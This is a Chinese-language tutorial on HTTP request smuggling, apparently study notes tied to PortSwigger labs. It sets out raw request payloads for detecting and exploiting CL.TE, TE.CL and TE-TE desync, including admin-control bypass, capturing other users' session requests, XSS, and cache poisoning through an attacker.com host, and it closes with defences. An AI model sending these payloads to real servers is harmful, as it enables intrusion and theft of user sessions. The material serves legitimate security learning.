详细笔记+实验:HTTP请求走私
字数 1334 2025-08-15 21:31:27
HTTP请求走私攻击全面指南
1. HTTP请求走私概述
HTTP请求走私(HTTP Request Smuggling)是一种利用前端服务器(如负载均衡器或反向代理)与后端服务器对HTTP请求解析差异的攻击技术。攻击者通过构造特殊格式的HTTP请求,使前后端服务器对请求边界产生不同理解,从而绕过安全控制或干扰其他用户的请求。
关键特点:
- 前端服务器负责安全控制,后端服务器无条件信任前端转发的请求
- 现代云架构中普遍存在这种前端-后端分离的架构
- 攻击通过同一后端网络连接发送多个请求实现
2. 漏洞产生原理
HTTP规范提供了两种指定请求结束位置的方法,导致潜在冲突:
-
Content-Length(CL)标头:直接指定消息体的字节长度
POST /search HTTP/1.1 Content-Length: 11 q=smuggling -
Transfer-Encoding(TE)标头:使用分块编码
POST /search HTTP/1.1 Transfer-Encoding: chunked b q=smuggling 0
漏洞根源:
- 某些服务器不支持Transfer-Encoding标头
- 某些服务器可能被混淆的Transfer-Encoding标头欺骗而不处理
- 前后端服务器对混淆标头的处理方式不同
3. HTTP请求走私类型
3.1 CL不为0的GET请求
场景:前端允许GET请求携带请求体,后端不允许
GET / HTTP/1.1
Host: example.com
Content-Length: 44
GET /secret HTTP/1.1
Host: example.com
3.2 CL-CL (双重Content-Length)
POST / HTTP/1.1
Host: example.com
Content-Length: 8
Content-Length: 7
12345
a
3.3 CL-TE
前端处理Content-Length,后端处理Transfer-Encoding
POST / HTTP/1.1
Host: example.com
Content-Length: 6
Transfer-Encoding: chunked
0
G
3.4 TE-CL
前端处理Transfer-Encoding,后端处理Content-Length
POST / HTTP/1.1
Host: example.com
Content-Length: 4
Transfer-Encoding: chunked
12
GPOST / HTTP/1.1
0
3.5 TE-TE
前后端都处理Transfer-Encoding,但对标头混淆处理不同
POST / HTTP/1.1
Host: example.com
Content-length: 4
Transfer-Encoding: chunked
Transfer-encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
4. 漏洞检测方法
4.1 计时技术检测
CL.TE漏洞检测:
POST / HTTP/1.1
Host: vulnerable.com
Transfer-Encoding: chunked
Content-Length: 4
1
A
X
TE.CL漏洞检测:
POST / HTTP/1.1
Host: vulnerable.com
Transfer-Encoding: chunked
Content-Length: 6
0
X
4.2 差异响应确认
CL.TE确认:
POST /search HTTP/1.1
Content-Length: 50
Transfer-Encoding: chunked
e
q=smuggling&x=
0
GET /404 HTTP/1.1
Foo: x
TE.CL确认:
POST /search HTTP/1.1
Content-Length: 4
Transfer-Encoding: chunked
7c
GET /404 HTTP/1.1
Host: vulnerable.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
x=
0
5. 漏洞利用技术
5.1 绕过前端安全控制
CL.TE利用:
POST /home HTTP/1.1
Content-Length: 60
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: localhost
Foo: xGET /home HTTP/1.1
Host: example.com
TE.CL利用:
POST / HTTP/1.1
Content-length: 4
Transfer-Encoding: chunked
71
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
5.2 显示前端请求重写
POST / HTTP/1.1
Content-Length: 109
Transfer-Encoding: chunked
0
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
search=test
5.3 捕获其他用户请求
POST / HTTP/1.1
Content-Length: 259
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 600
Cookie: session=...
csrf=...&postId=4&name=joker&email=test@test.com&website=&comment=test
5.4 利用反射XSS
POST / HTTP/1.1
Host: example.com
Content-Length: 138
Transfer-Encoding: chunked
0
GET /post?postId=3 HTTP/1.1
User-Agent: "><script>alert(1)</script>#
5.5 开放重定向
POST / HTTP/1.1
Host: vulnerable.com
Content-Length: 54
Transfer-Encoding: chunked
0
GET /home HTTP/1.1
Host: attacker.com
Foo: X
5.6 Web缓存投毒
POST / HTTP/1.1
Host: vulnerable.com
Content-Length: 182
Transfer-Encoding: chunked
0
GET /post/next?postId=3 HTTP/1.1
Host: attacker.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
x=1
5.7 Web缓存欺骗
POST / HTTP/1.1
Host: example.com
Content-Length: 44
Transfer-Encoding: chunked
0
GET /my-account HTTP/1.1
X-Ignore: X
6. 防御措施
- 禁用后端连接重用:每个后端请求通过单独的网络连接发送
- 使用HTTP/2:防止请求边界歧义
- 统一前后端服务器:使用相同Web服务器软件确保一致解析
- 规范化歧义请求:前端服务器规范化或后端服务器拒绝歧义请求
- 严格验证标头:拒绝包含冲突标头的请求
7. 实验与实践
文中提到的多个实验可在PortSwigger的Web安全学院找到:
- CL-TE基础实验:
https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te - TE-CL基础实验:
https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl - TE-TE混淆实验:
https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header
通过实际操作这些实验可以深入理解各种HTTP请求走私技术的具体应用场景和利用方法。